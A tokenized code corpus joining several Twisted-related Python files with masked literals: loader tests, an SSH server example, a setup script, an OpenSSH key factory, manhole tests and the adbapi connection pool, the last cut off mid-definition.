<EOL> loader = loaders . xmlstr ( slotsdoc ) <EOL> loaded = loader . load ( ) <EOL> self . assertEquals ( loaded [ <NUM_LIT:1> ] . default , None ) <EOL> self . assertEquals ( loaded [ <NUM_LIT:3> ] . default , "<STR_LIT:3>" ) <EOL> def test_xmlfile ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( self . nsdoc ) <EOL> f . close ( ) <EOL> loader = loaders . xmlfile ( temp ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> loader = loaders . xmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> l1 = loaders . xmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . 
xmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> l1 = loaders . xmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . xmlfile ( temp , pattern = '<STR_LIT:2>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> def test_xmlfileReload ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( self . nsdoc ) <EOL> f . close ( ) <EOL> loader = loaders . xmlfile ( temp ) <EOL> r = loader . load ( ) <EOL> self . assertEquals ( id ( r ) , id ( loader . load ( ) ) ) <EOL> os . utime ( temp , ( os . path . getatime ( temp ) , os . path . getmtime ( temp ) + <NUM_LIT:5> ) ) <EOL> self . assertNotEqual ( id ( r ) , id ( loader . load ( ) ) ) <EOL> def test_reloadAfterPrecompile ( self ) : <EOL> """<STR_LIT:U+0020>""" <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . close ( ) <EOL> ctx = context . WovenContext ( ) <EOL> doc = loaders . htmlfile ( temp ) <EOL> pc = flat . precompile ( flat . flatten ( doc ) , ctx ) <EOL> before = '<STR_LIT>' . join ( flat . serialize ( pc , ctx ) ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . close ( ) <EOL> os . utime ( temp , ( os . path . getatime ( temp ) , os . path . getmtime ( temp ) + <NUM_LIT:5> ) ) <EOL> after = '<STR_LIT>' . join ( flat . serialize ( pc , ctx ) ) <EOL> self . assertIn ( '<STR_LIT:foo>' , before ) <EOL> self . assertIn ( '<STR_LIT:bar>' , after ) <EOL> self . failIfEqual ( before , after ) <EOL> test_reloadAfterPrecompile . todo = '<STR_LIT>' '<STR_LIT>' <EOL> class TestContext ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_stan ( self ) : <EOL> doc = t . p [ '<STR_LIT:hello>' ] <EOL> self . _withAndWithout ( loaders . stan ( doc ) ) <EOL> def test_xmlstr ( self ) : <EOL> doc = '<STR_LIT>' <EOL> self . _withAndWithout ( loaders . 
xmlstr ( doc ) ) <EOL> def test_xmlfile ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . close ( ) <EOL> self . _withAndWithout ( loaders . xmlfile ( temp ) ) <EOL> def test_htmlstr ( self ) : <EOL> doc = '<STR_LIT>' <EOL> self . _withAndWithout ( loaders . htmlstr ( doc ) ) <EOL> test_htmlstr . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_htmlfile ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . close ( ) <EOL> self . _withAndWithout ( loaders . htmlfile ( temp ) ) <EOL> test_htmlfile . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def _withAndWithout ( self , loader ) : <EOL> ctx = context . WovenContext ( ) <EOL> self . assertEquals ( loader . load ( ) , [ '<STR_LIT>' ] ) <EOL> self . assertEquals ( loader . load ( ctx ) , [ '<STR_LIT>' ] ) <EOL> class TestParsing ( unittest . TestCase ) : <EOL> def test_missingSpace ( self ) : <EOL> doc = '<STR_LIT>' <EOL> result = loaders . xmlstr ( doc ) . load ( ) <EOL> self . assertEquals ( result [ <NUM_LIT:2> ] , '<STR_LIT:U+0020>' ) </s>
<s> from twisted . internet . task import react <EOL> from _utils import print_response <EOL> import treq <EOL> def main ( reactor , * args ) : <EOL> d = treq . get ( '<STR_LIT>' , allow_redirects = False ) <EOL> d . addCallback ( print_response ) <EOL> return d <EOL> react ( main , [ ] ) </s>
<s> from twisted . cred import portal <EOL> from twisted . cred . checkers import InMemoryUsernamePasswordDatabaseDontUse <EOL> from twisted . conch import avatar <EOL> from twisted . conch . checkers import SSHPublicKeyChecker , InMemorySSHKeyDB <EOL> from twisted . conch . ssh import factory , userauth , connection , keys , session <EOL> from twisted . conch . ssh . transport import SSHServerTransport <EOL> from twisted . internet import reactor , protocol <EOL> from twisted . python import log <EOL> from twisted . python import components <EOL> from zope . interface import implements <EOL> import sys <EOL> log . startLogging ( sys . stderr ) <EOL> """<STR_LIT>""" <EOL> SERVER_RSA_PRIVATE = '<STR_LIT>' <EOL> SERVER_RSA_PUBLIC = '<STR_LIT>' <EOL> CLIENT_RSA_PUBLIC = '<STR_LIT>' <EOL> PRIMES = { <EOL> <NUM_LIT> : [ ( <NUM_LIT:2> L , <NUM_LIT> L ) ] , <EOL> <NUM_LIT> : [ ( <NUM_LIT:2> L , <NUM_LIT> L ) ] , <EOL> } <EOL> class ExampleAvatar ( avatar . ConchUser ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , username ) : <EOL> avatar . ConchUser . __init__ ( self ) <EOL> self . username = username <EOL> self . channelLookup . update ( { '<STR_LIT>' : session . SSHSession } ) <EOL> class ExampleRealm ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( portal . IRealm ) <EOL> def requestAvatar ( self , avatarId , mind , * interfaces ) : <EOL> """<STR_LIT>""" <EOL> return interfaces [ <NUM_LIT:0> ] , ExampleAvatar ( avatarId ) , lambda : None <EOL> class EchoProtocol ( protocol . Protocol ) : <EOL> """<STR_LIT>""" <EOL> def dataReceived ( self , data ) : <EOL> """<STR_LIT>""" <EOL> if data == '<STR_LIT:\r>' : <EOL> data = '<STR_LIT:\r\n>' <EOL> elif data == '<STR_LIT>' : <EOL> self . transport . loseConnection ( ) <EOL> return <EOL> self . transport . 
write ( data ) <EOL> class ExampleSession ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , avatar ) : <EOL> """<STR_LIT>""" <EOL> def getPty ( self , term , windowSize , attrs ) : <EOL> """<STR_LIT>""" <EOL> def execCommand ( self , proto , cmd ) : <EOL> """<STR_LIT>""" <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def openShell ( self , transport ) : <EOL> """<STR_LIT>""" <EOL> protocol = EchoProtocol ( ) <EOL> protocol . makeConnection ( transport ) <EOL> transport . makeConnection ( session . wrapProtocol ( protocol ) ) <EOL> def eofReceived ( self ) : <EOL> pass <EOL> def closed ( self ) : <EOL> pass <EOL> components . registerAdapter ( ExampleSession , ExampleAvatar , session . ISession ) <EOL> class ExampleFactory ( factory . SSHFactory ) : <EOL> """<STR_LIT>""" <EOL> protocol = SSHServerTransport <EOL> publicKeys = { <EOL> '<STR_LIT>' : keys . Key . fromFile ( SERVER_RSA_PUBLIC ) <EOL> } <EOL> privateKeys = { <EOL> '<STR_LIT>' : keys . Key . fromFile ( SERVER_RSA_PRIVATE ) <EOL> } <EOL> services = { <EOL> '<STR_LIT>' : userauth . SSHUserAuthServer , <EOL> '<STR_LIT>' : connection . SSHConnection <EOL> } <EOL> def getPrimes ( self ) : <EOL> """<STR_LIT>""" <EOL> return PRIMES <EOL> portal = portal . Portal ( ExampleRealm ( ) ) <EOL> passwdDB = InMemoryUsernamePasswordDatabaseDontUse ( ) <EOL> passwdDB . addUser ( '<STR_LIT:user>' , '<STR_LIT:password>' ) <EOL> sshDB = SSHPublicKeyChecker ( InMemorySSHKeyDB ( <EOL> { '<STR_LIT:user>' : [ keys . Key . fromFile ( CLIENT_RSA_PUBLIC ) ] } ) ) <EOL> portal . registerChecker ( passwdDB ) <EOL> portal . registerChecker ( sshDB ) <EOL> ExampleFactory . portal = portal <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> reactor . listenTCP ( <NUM_LIT> , ExampleFactory ( ) ) <EOL> reactor . run ( ) </s>
<s> from __future__ import division , absolute_import <EOL> import sys <EOL> import os <EOL> from setuptools import setup , find_packages <EOL> from setuptools . command . build_py import build_py <EOL> from distutils . command . build_scripts import build_scripts <EOL> class PickyBuildPy ( build_py ) : <EOL> """<STR_LIT>""" <EOL> def find_package_modules ( self , package , package_dir ) : <EOL> from twisted . python . dist3 import modulesToInstall , testDataFiles <EOL> modules = [ <EOL> module for module <EOL> in super ( build_py , self ) . find_package_modules ( package , package_dir ) <EOL> if "<STR_LIT:.>" . join ( [ module [ <NUM_LIT:0> ] , module [ <NUM_LIT:1> ] ] ) in modulesToInstall or <EOL> "<STR_LIT:.>" . join ( [ module [ <NUM_LIT:0> ] , module [ <NUM_LIT:1> ] ] ) in testDataFiles ] <EOL> return modules <EOL> class PickyBuildScripts ( build_scripts ) : <EOL> """<STR_LIT>""" <EOL> def copy_scripts ( self ) : <EOL> from twisted . python . dist3 import portedScripts <EOL> self . scripts = portedScripts <EOL> return super ( PickyBuildScripts , self ) . copy_scripts ( ) <EOL> def main ( ) : <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT:.>' ) <EOL> from twisted . python . dist import STATIC_PACKAGE_METADATA , getScripts <EOL> args = STATIC_PACKAGE_METADATA . copy ( ) <EOL> args . update ( dict ( <EOL> cmdclass = { <EOL> '<STR_LIT>' : PickyBuildPy , <EOL> '<STR_LIT>' : PickyBuildScripts , <EOL> } , <EOL> packages = find_packages ( ) , <EOL> install_requires = [ "<STR_LIT>" ] , <EOL> zip_safe = False , <EOL> include_package_data = True , <EOL> scripts = getScripts ( ) , <EOL> ) ) <EOL> setup ( ** args ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os , errno <EOL> from twisted . python import log <EOL> from twisted . python . util import runAsEffectiveUser <EOL> from twisted . conch . ssh import keys , factory , common <EOL> from twisted . conch . openssh_compat import primes <EOL> class OpenSSHFactory ( factory . SSHFactory ) : <EOL> dataRoot = '<STR_LIT>' <EOL> moduliRoot = '<STR_LIT>' <EOL> def getPublicKeys ( self ) : <EOL> """<STR_LIT>""" <EOL> ks = { } <EOL> for filename in os . listdir ( self . dataRoot ) : <EOL> if filename [ : <NUM_LIT:9> ] == '<STR_LIT>' and filename [ - <NUM_LIT:8> : ] == '<STR_LIT>' : <EOL> try : <EOL> k = keys . Key . fromFile ( <EOL> os . path . join ( self . dataRoot , filename ) ) <EOL> t = common . getNS ( k . blob ( ) ) [ <NUM_LIT:0> ] <EOL> ks [ t ] = k <EOL> except Exception as e : <EOL> log . msg ( '<STR_LIT>' % ( filename , e ) ) <EOL> return ks <EOL> def getPrivateKeys ( self ) : <EOL> """<STR_LIT>""" <EOL> privateKeys = { } <EOL> for filename in os . listdir ( self . dataRoot ) : <EOL> if filename [ : <NUM_LIT:9> ] == '<STR_LIT>' and filename [ - <NUM_LIT:4> : ] == '<STR_LIT>' : <EOL> fullPath = os . path . join ( self . dataRoot , filename ) <EOL> try : <EOL> key = keys . Key . fromFile ( fullPath ) <EOL> except IOError as e : <EOL> if e . errno == errno . EACCES : <EOL> key = runAsEffectiveUser ( <EOL> <NUM_LIT:0> , <NUM_LIT:0> , keys . Key . fromFile , fullPath ) <EOL> privateKeys [ key . sshType ( ) ] = key <EOL> else : <EOL> raise <EOL> except Exception as e : <EOL> log . msg ( '<STR_LIT>' % ( filename , e ) ) <EOL> else : <EOL> privateKeys [ key . sshType ( ) ] = key <EOL> return privateKeys <EOL> def getPrimes ( self ) : <EOL> try : <EOL> return primes . parseModuliFile ( self . moduliRoot + '<STR_LIT>' ) <EOL> except IOError : <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> import traceback <EOL> from twisted . trial import unittest <EOL> from twisted . internet import error , defer <EOL> from twisted . test . proto_helpers import StringTransport <EOL> from twisted . conch . test . test_recvline import ( <EOL> _TelnetMixin , _SSHMixin , _StdioMixin , stdio , ssh ) <EOL> from twisted . conch import manhole <EOL> from twisted . conch . insults import insults <EOL> def determineDefaultFunctionName ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> <NUM_LIT:1> // <NUM_LIT:0> <EOL> except : <EOL> return traceback . extract_stack ( ) [ - <NUM_LIT:2> ] [ <NUM_LIT:2> ] <EOL> defaultFunctionName = determineDefaultFunctionName ( ) <EOL> class ManholeInterpreterTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_resetBuffer ( self ) : <EOL> """<STR_LIT>""" <EOL> interpreter = manhole . ManholeInterpreter ( None ) <EOL> interpreter . buffer . extend ( [ "<STR_LIT:1>" , "<STR_LIT:2>" ] ) <EOL> interpreter . resetBuffer ( ) <EOL> self . assertFalse ( interpreter . buffer ) <EOL> class ManholeProtocolTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_interruptResetsInterpreterBuffer ( self ) : <EOL> """<STR_LIT>""" <EOL> transport = StringTransport ( ) <EOL> terminal = insults . ServerProtocol ( manhole . Manhole ) <EOL> terminal . makeConnection ( transport ) <EOL> protocol = terminal . terminalProtocol <EOL> interpreter = protocol . interpreter <EOL> interpreter . buffer . extend ( [ "<STR_LIT:1>" , "<STR_LIT:2>" ] ) <EOL> protocol . handle_INT ( ) <EOL> self . assertFalse ( interpreter . buffer ) <EOL> class WriterTests ( unittest . TestCase ) : <EOL> def testInteger ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT:1>" ) <EOL> def testDoubleQuoteString ( self ) : <EOL> manhole . lastColorizedLine ( '<STR_LIT>' ) <EOL> def testSingleQuoteString ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> def testTripleSingleQuotedString ( self ) : <EOL> manhole . 
lastColorizedLine ( "<STR_LIT>" ) <EOL> def testTripleDoubleQuotedString ( self ) : <EOL> manhole . lastColorizedLine ( '<STR_LIT>' ) <EOL> def testFunctionDefinition ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> def testClassDefinition ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> class ManholeLoopbackMixin : <EOL> serverProtocol = manhole . ColoredManhole <EOL> def wfd ( self , d ) : <EOL> return defer . waitForDeferred ( d ) <EOL> def testSimpleExpression ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT:2>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testTripleQuoteLineContinuation ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testFunctionDefinition ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testClassDefinition ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . 
_assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testException ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' + defaultFunctionName , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testControlC ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" + manhole . CTRL_C + <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def test_interruptDuringContinuation ( self ) : <EOL> """<STR_LIT>""" <EOL> continuing = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> def gotContinuation ( ignored ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> interrupted = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( manhole . CTRL_C ) <EOL> return interrupted <EOL> continuing . addCallback ( gotContinuation ) <EOL> def gotInterruption ( ignored ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> continuing . addCallback ( gotInterruption ) <EOL> return continuing <EOL> def testControlBackslash ( self ) : <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> partialLine = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> def gotPartialLine ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_BACKSLASH ) <EOL> d = self . recvlineClient . 
onDisconnection <EOL> return self . assertFailure ( d , error . ConnectionDone ) <EOL> def gotClearedLine ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" ] ) <EOL> return partialLine . addCallback ( gotPartialLine ) . addCallback ( <EOL> gotClearedLine ) <EOL> @ defer . inlineCallbacks <EOL> def test_controlD ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_D + "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( "<STR_LIT:\n>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( manhole . CTRL_D ) <EOL> d = self . recvlineClient . onDisconnection <EOL> yield self . assertFailure ( d , error . ConnectionDone ) <EOL> @ defer . inlineCallbacks <EOL> def testControlL ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_L + "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> def test_controlA ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT:p>' ) <EOL> d = self . recvlineClient . expect ( '<STR_LIT>' ) <EOL> def cb ( ignore ) : <EOL> self . _assertBuffer ( [ '<STR_LIT>' ] ) <EOL> return d . addCallback ( cb ) <EOL> def test_controlE ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT:p>' + '<STR_LIT>' + '<STR_LIT:">' ) <EOL> d = self . recvlineClient . expect ( '<STR_LIT>' ) <EOL> def cb ( ignore ) : <EOL> self . _assertBuffer ( [ '<STR_LIT>' ] ) <EOL> return d . addCallback ( cb ) <EOL> @ defer . 
inlineCallbacks <EOL> def test_deferred ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( <EOL> "<STR_LIT>" ) <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> class ManholeLoopbackTelnetTests ( _TelnetMixin , unittest . TestCase , <EOL> ManholeLoopbackMixin ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ManholeLoopbackSSHTests ( _SSHMixin , unittest . TestCase , <EOL> ManholeLoopbackMixin ) : <EOL> """<STR_LIT>""" <EOL> if ssh is None : <EOL> skip = "<STR_LIT>" <EOL> class ManholeLoopbackStdioTests ( _StdioMixin , unittest . TestCase , <EOL> ManholeLoopbackMixin ) : <EOL> """<STR_LIT>""" <EOL> if stdio is None : <EOL> skip = "<STR_LIT>" <EOL> else : <EOL> serverProtocol = stdio . ConsoleManhole </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from twisted . internet import threads <EOL> from twisted . python import reflect , log <EOL> class ConnectionLost ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class Connection ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pool ) : <EOL> self . _pool = pool <EOL> self . _connection = None <EOL> self . reconnect ( ) <EOL> def close ( self ) : <EOL> pass <EOL> def rollback ( self ) : <EOL> if not self . _pool . reconnect : <EOL> self . _connection . rollback ( ) <EOL> return <EOL> try : <EOL> self . _connection . rollback ( ) <EOL> curs = self . _connection . cursor ( ) <EOL> curs . execute ( self . _pool . good_sql ) <EOL> curs . close ( ) <EOL> self . _connection . commit ( ) <EOL> return <EOL> except : <EOL> log . err ( None , "<STR_LIT>" ) <EOL> self . _pool . disconnect ( self . _connection ) <EOL> if self . _pool . noisy : <EOL> log . msg ( "<STR_LIT>" ) <EOL> raise ConnectionLost ( ) <EOL> def reconnect ( self ) : <EOL> if self . _connection is not None : <EOL> self . _pool . disconnect ( self . _connection ) <EOL> self . _connection = self . _pool . connect ( ) <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . _connection , name ) <EOL> class Transaction : <EOL> """<STR_LIT>""" <EOL> _cursor = None <EOL> def __init__ ( self , pool , connection ) : <EOL> self . _pool = pool <EOL> self . _connection = connection <EOL> self . reopen ( ) <EOL> def close ( self ) : <EOL> _cursor = self . _cursor <EOL> self . _cursor = None <EOL> _cursor . close ( ) <EOL> def reopen ( self ) : <EOL> if self . _cursor is not None : <EOL> self . close ( ) <EOL> try : <EOL> self . _cursor = self . _connection . cursor ( ) <EOL> return <EOL> except : <EOL> if not self . _pool . reconnect : <EOL> raise <EOL> else : <EOL> log . err ( None , "<STR_LIT>" ) <EOL> if self . _pool . noisy : <EOL> log . msg ( '<STR_LIT>' ) <EOL> self . reconnect ( ) <EOL> self . _cursor = self . _connection . 
cursor ( ) <EOL> def reconnect ( self ) : <EOL> self . _connection . reconnect ( ) <EOL> self . _cursor = None <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . _cursor , name ) <EOL> class ConnectionPool : <EOL> """<STR_LIT>""" <EOL> CP_ARGS = "<STR_LIT>" . split ( ) <EOL> noisy = False <EOL> min = <NUM_LIT:3> <EOL> max = <NUM_LIT:5> <EOL> name = None <EOL> openfun = None <EOL> reconnect = False <EOL> good_sql = '<STR_LIT>' <EOL> running = False <EOL> connectionFactory = Connection <EOL> transactionFactory = Transaction <EOL> shutdownID = None <EOL> def __init__ ( self , dbapiName , * connargs , ** connkw ) : <EOL> """<STR_LIT>""" <EOL> self . dbapiName = dbapiName <EOL> self . dbapi = reflect . namedModule ( dbapiName ) <EOL> if getattr ( self . dbapi , '<STR_LIT>' , None ) != '<STR_LIT>' : <EOL> log . msg ( '<STR_LIT>' ) <EOL> if getattr ( self . dbapi , '<STR_LIT>' , <NUM_LIT:0> ) < <NUM_LIT:1> : <EOL> log . msg ( '<STR_LIT>' ) <EOL> reactor = connkw . pop ( '<STR_LIT>' , None ) <EOL> if reactor is None : <EOL> from twisted . internet import reactor <EOL> self . _reactor = reactor <EOL> self . connargs = connargs <EOL> self . connkw = connkw <EOL> for arg in self . CP_ARGS : <EOL> cpArg = '<STR_LIT>' % ( arg , ) <EOL> if cpArg in connkw : <EOL> setattr ( self , arg , connkw [ cpArg ] ) <EOL> del connkw [ cpArg ] <EOL> self . min = min ( self . min , self . max ) <EOL> self . max = max ( self . min , self . max ) <EOL> self . connections = { } <EOL> from twisted . python import threadpool <EOL> import thread <EOL> self . threadID = thread . get_ident <EOL> self . threadpool = threadpool . ThreadPool ( self . min , self . max ) <EOL> self . startID = self . _reactor . callWhenRunning ( self . _start ) <EOL> def _start ( self ) : <EOL> self . startID = None <EOL> return self . start ( ) <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . running : <EOL> self . threadpool . start ( ) <EOL> self . shutdownID = self . _reactor . 
addSystemEventTrigger ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . finalClose ) <EOL> self . running = True <EOL> def runWithConnection ( self , func , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> return threads . deferToThreadPool ( reactor , self . threadpool , <EOL> self . _runWithConnection , <EOL> func , * args , ** kw ) <EOL> def _runWithConnection ( self , func , * args , ** kw ) : <EOL> conn = self . connectionFactory ( self ) <EOL> try : <EOL> result = func ( conn , * args , ** kw ) <EOL> conn . commit ( ) <EOL> return result <EOL> except : <EOL> excType , excValue , excTraceback = sys . exc_info ( ) <EOL> try : <EOL> conn . rollback ( ) <EOL> except : <EOL> log . err ( None , "<STR_LIT>" ) <EOL> raise excType , excValue , excTraceback <EOL> def runInteraction ( self , interaction , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> return threads . deferToThreadPool ( reactor , self . threadpool , <EOL> self . _runInteraction , <EOL> interaction , * args , ** kw ) <EOL> def runQuery ( self , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> return self . runInteraction ( self . _runQuery , * args , ** kw ) <EOL> def runOperation ( self , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> return self . runInteraction ( self . _runOperation , * args , ** kw ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . shutdownID : <EOL> self . _reactor . removeSystemEventTrigger ( self . shutdownID ) <EOL> self . shutdownID = None <EOL> if self . startID : <EOL> self . _reactor . removeSystemEventTrigger ( self . startID ) <EOL> self . startID = None <EOL> self . finalClose ( ) <EOL> def finalClose ( self ) : <EOL> """<STR_LIT>""" <EOL> self . shutdownID = None <EOL> self . threadpool . stop ( ) <EOL> self . running = False <EOL> for conn in self . connections . values ( ) : <EOL> self . _close ( conn ) <EOL> self . connections . 
clear ( ) <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> tid = self . threadID ( ) <EOL> conn = self . connections . get ( tid ) <EOL> if conn is None : <EOL> if self . noisy : <EOL> log . msg ( '<STR_LIT>' % ( self . dbapiName , <EOL> self . connargs or '<STR_LIT>' , <EOL> self . connkw or '<STR_LIT>' ) ) <EOL> conn = self . dbapi . connect ( * self . connargs , ** self . connkw ) <EOL> if self . openfun != None : <EOL> self . openfun ( conn ) <EOL> self . connections [ tid ] = conn <EOL> return conn <EOL> def disconnect ( self , conn ) : <EOL> """<STR_LIT>""" <EOL> tid = self . threadID ( ) <EOL> if conn is not self . connections . get ( tid ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if conn is not None : <EOL> self . _close ( conn ) <EOL> del self . connections [ tid ] <EOL> def _close ( self , conn ) : <EOL> if self . noisy : <EOL> log . msg ( '<STR_LIT>' % ( self . dbapiName , ) ) <EOL> try : <EOL> conn . close ( ) <EOL> except : <EOL> log . err ( None , "<STR_LIT>" ) <EOL> def _runInteraction ( self , interaction 